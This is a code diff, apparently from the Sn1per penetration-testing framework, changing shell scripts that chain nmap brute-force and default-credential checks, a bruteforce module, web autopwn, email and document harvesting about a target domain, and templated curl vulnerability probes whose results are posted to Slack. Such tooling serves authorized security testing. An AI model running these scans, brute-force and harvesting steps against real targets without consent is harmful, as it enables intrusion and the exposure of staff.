http-default-accounts.fingerprintfile=/usr/share/sniper/bin/http-default-accounts-fingerprints-nndefaccts.lua $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port443
|
||||
nmap -sV -Pn -p 443 -v --script-timeout 90 --script=http-auth-finder,http-auth,http-brute,/usr/share/nmap/scripts/vulners,http-default-accounts $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port443
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port443 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port443.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/nmap-$TARGET-port443 2> /dev/null
|
||||
fi
|
||||
|
|
@ -802,13 +811,6 @@ else
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl https://$TARGET 2> $LOOT_DIR/web/curldebug-$TARGET.txt > /dev/null
|
||||
fi
|
||||
#if [[ "$METASPLOIT_EXPLOIT" == "1" ]]; then
|
||||
# echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
# echo -e "$OKRED CHECKING FOR INSECURE SSL/TLS CONFIGURATIONS $RESET"
|
||||
# echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
#fi
|
||||
# NEED TO FINISH...
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -823,8 +825,28 @@ else
|
|||
cd $LOOT_DIR
|
||||
python2 $INSTALL_DIR/bin/webscreenshot.py https://$TARGET:443
|
||||
fi
|
||||
|
||||
source $INSTALL_DIR/modes/normal_webporthttps.sh
|
||||
|
||||
cd $INSTALL_DIR
|
||||
PORT="443"
|
||||
SSL="true"
|
||||
source $INSTALL_DIR/modes/web_autopwn.sh
|
||||
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
|
||||
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
|
||||
|
||||
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
done
|
||||
fi
|
||||
|
||||
source $INSTALL_DIR/modes/osint_stage_2.sh
|
||||
|
||||
fi
|
||||
|
||||
if [[ -z "$port_445" ]]; then
|
||||
|
|
@ -1440,6 +1462,10 @@ if [[ $YASUO = "1" ]]; then
|
|||
fi
|
||||
fi
|
||||
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
|
||||
fi
|
||||
|
||||
cd $INSTALL_DIR
|
||||
source $INSTALL_DIR/modes/fullportscan.sh
|
||||
source $INSTALL_DIR/modes/bruteforce.sh
|
||||
|
|
@ -1465,11 +1491,11 @@ echo -e "${OKGREEN}=============================================================
|
|||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
mv $LOOT_DIR/scans/running-$TARGET-normal.txt $LOOT_DIR/scans/finished-$TARGET-normal.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running-*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [normal] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [normal] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
if [[ "$LOOT" = "1" ]] && [[ -z "$NOLOOT" ]]; then
|
||||
loot
|
||||
|
|
|
|||
|
|
@ -1,6 +1,6 @@
|
|||
if [[ "$MODE" = "web" ]]; then
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running-$TARGET-$MODE.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running-*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per HTTP web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
|
|
@ -150,18 +150,10 @@ if [[ "$MODE" = "web" ]]; then
|
|||
rm -f $LOOT_DIR/web/jexboss-$TARGET-port80.raw 2> /dev/null
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
|
||||
mv $LOOT_DIR/scans/running-$TARGET-$MODE.txt $LOOT_DIR/scans/finished-$TARGET-$MODE.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running-*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per HTTP web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per HTTP web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
|
||||
cd $INSTALL_DIR
|
||||
PORT="80"
|
||||
SSL="false"
|
||||
source $INSTALL_DIR/modes/web_autopwn.sh
|
||||
|
||||
fi
|
||||
|
|
@ -1,6 +1,6 @@
|
|||
if [[ "$MODE" = "web" ]]; then
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running-$TARGET-$MODE.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running-*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per HTTPS web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
|
|
@ -149,18 +149,10 @@ if [[ "$MODE" = "web" ]]; then
|
|||
rm -f $LOOT_DIR/web/jexboss-$TARGET-port443.raw 2> /dev/null
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
|
||||
mv $LOOT_DIR/scans/running-$TARGET-$MODE.txt $LOOT_DIR/scans/finished-$TARGET-$MODE.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running-*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per HTTPS web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per HTTPS web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
|
||||
cd $INSTALL_DIR
|
||||
PORT="443"
|
||||
SSL="true"
|
||||
source $INSTALL_DIR/modes/web_autopwn.sh
|
||||
|
||||
fi
|
||||
fi
|
||||
|
|
@ -40,27 +40,19 @@ if [[ "$MODE" = "nuke" ]]; then
|
|||
echo -e "$OKORANGE + -- --=[WARNING! Nuking ALL target! $RESET"
|
||||
echo -e "$RESET"
|
||||
if [[ ! -z "$WORKSPACE_DIR" ]]; then
|
||||
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
|
||||
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
|
||||
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
else
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "Starting scan: $TARGET $MODE `date +"%Y-%m-%d %H:%M"`"
|
||||
fi
|
||||
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
fi
|
||||
args=""
|
||||
done
|
||||
fi
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
|
||||
if [[ "$LOOT" = "1" ]]; then
|
||||
loot
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -37,7 +37,7 @@ if [[ "$OSINT" = "1" ]]; then
|
|||
fi
|
||||
cp -f /etc/theHarvester/api-keys.yaml ~/api-keys.yaml 2> /dev/null
|
||||
cd ~ 2> /dev/null
|
||||
theharvester -d $TARGET -b baidu,bing,bingapi,certspotter,crtsh,dnsdumpster,dogpile,duckduckgo,google,hunter,intelx,linkedin,linkedin_links,netcraft,otx,securityTrails,spyse,threatcrowd,trello,twitter,vhost,virustotal,yahoo 2> /dev/null | tee $LOOT_DIR/osint/theharvester-$TARGET.txt 2> /dev/null
|
||||
theharvester -d $TARGET -b baidu,bing,bingapi,certspotter,crtsh,dnsdumpster,dogpile,duckduckgo,google,hunter,intelx,linkedin,linkedin_links,netcraft,otx,securityTrails,spyse,threatcrowd,trello,twitter,vhost,virustotal,yahoo 2> /dev/null | tee $LOOT_DIR/osint/theharvester-$TARGET.txt 2> /dev/null
|
||||
cd $INSTALL_DIR 2> /dev/null
|
||||
if [[ "$SLACK_NOTIFICATIONS_THEHARVESTER" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/theharvester-$TARGET.txt"
|
||||
|
|
@ -47,7 +47,7 @@ if [[ "$OSINT" = "1" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING EMAILS FROM EMAIL-FORMAT.COM $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -s https://www.email-format.com/d/$TARGET| grep @$TARGET | grep -v div | sed "s/\t//g" | sed "s/ //g" 2> /dev/null | tee $LOOT_DIR/osint/email-format-$TARGET.txt 2> /dev/null
|
||||
curl -s https://www.email-format.com/d/$TARGET| grep @$TARGET | grep -v div | sed "s/\t//g" | sed "s/ //g" 2> /dev/null | tee $LOOT_DIR/osint/email-format-$TARGET.txt 2> /dev/null
|
||||
|
||||
if [[ "$SLACK_NOTIFICATIONS_EMAIL_FORMAT" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/email-format-$TARGET.txt"
|
||||
|
|
@ -67,7 +67,7 @@ if [[ "$OSINT" = "1" ]]; then
|
|||
echo -e "$OKRED COLLECTING OSINT FROM ONLINE DOCUMENTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cd $INSTALL_DIR/plugins/metagoofil/
|
||||
python metagoofil.py -d $TARGET -t doc,pdf,xls,csv,txt -l 25 -n 25 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt 2> /dev/null
|
||||
python metagoofil.py -d $TARGET -t doc,pdf,xls,csv,txt -l 25 -n 25 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt 2> /dev/null
|
||||
cd $INSTALL_DIR
|
||||
if [[ "$SLACK_NOTIFICATIONS_METAGOOFIL" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/metagoofil-$TARGET.txt"
|
||||
|
|
|
|||
|
|
@ -35,8 +35,7 @@ if [[ "$RECON" = "1" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -d $TARGET -w $DOMAINS_DEFAULT -t 100 2>/dev/null
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-subfinder.txt
|
||||
fi
|
||||
|
||||
fi
|
||||
if [[ "$DNSCAN" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS VIA DNSCAN (THIS COULD TAKE A WHILE...) $RESET"
|
||||
|
|
|
|||
|
|
@ -0,0 +1,17 @@
|
|||
for file in `ls $INSTALL_DIR/templates/active/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
|
||||
#echo $file
|
||||
if [[ "$SSL" == "true" ]]; then
|
||||
if [[ -z "$PORT" ]]; then
|
||||
PORT="443"
|
||||
fi
|
||||
curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "https://${TARGET}:${PORT}${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out && echo "$SEVERITY, $VULN_NAME,https://${TARGET}:${PORT}${URI},$(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$PORT-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT/$URI - EVIDENCE: $(cat /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://${TARGET}:${PORT}${URI} - EVIDENCE: $(cat /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$PORT-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
else
|
||||
if [[ -z "$PORT" ]]; then
|
||||
PORT="80"
|
||||
fi
|
||||
curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "http://${TARGET}:${PORT}${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out && echo "$SEVERITY, $VULN_NAME,http://${TARGET}:${PORT}${URI},$(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$PORT-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(cat /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://${TARGET}:${PORT}${URI} - EVIDENCE: $(cat /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$PORT-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
fi
|
||||
rm -f /tmp/match.out 2> /dev/null
|
||||
done
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SC0PE NETWORK VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
for file in `ls $INSTALL_DIR/templates/passive/network/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
|
||||
if [[ "$SEARCH" == "negative" ]]; then
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out || echo "$SEVERITY, $VULN_NAME, $TARGET, $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(head -n 1 /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
else
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out && echo "$SEVERITY, $VULN_NAME, $TARGET, $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(head -n 1 /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $FILENME - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
fi
|
||||
rm -f /tmp/match.out 2> /dev/null
|
||||
done
|
||||
|
||||
for file in `ls $INSTALL_DIR/templates/passive/network/recursive/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
done
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -0,0 +1,30 @@
|
|||
for file in `ls $INSTALL_DIR/templates/passive/web/*.sh 2> /dev/null`; do
|
||||
source $file
|
||||
OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
|
||||
if [[ "$SEARCH" == "negative" ]]; then
|
||||
if [[ "$SSL" == "true" ]]; then
|
||||
if [[ -z "$PORT" ]]; then
|
||||
PORT="443"
|
||||
fi
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out || echo "$SEVERITY, $VULN_NAME, https://$TARGET:$PORT/$URI, $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
else
|
||||
if [[ -z "$PORT" ]]; then
|
||||
PORT="80"
|
||||
fi
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out || echo "$SEVERITY, $VULN_NAME, http://$TARGET:$PORT/$URI, $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
fi
|
||||
else
|
||||
if [[ "$SSL" == "true" ]]; then
|
||||
if [[ -z "$PORT" ]]; then
|
||||
PORT="443"
|
||||
fi
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out && echo "$SEVERITY, $VULN_NAME, https://$TARGET:$PORT/$URI, $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
else
|
||||
if [[ -z "$PORT" ]]; then
|
||||
PORT="80"
|
||||
fi
|
||||
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/match.out && echo "$SEVERITY, $VULN_NAME, http://$TARGET:$PORT/$URI, $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
rm -f /tmp/match.out 2> /dev/null
|
||||
done
|
||||
|
|
@ -21,4 +21,9 @@
|
|||
egrep -h LOW $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
|
||||
egrep -h INFO $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
|
||||
echo "====================================================================================" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
|
||||
|
||||
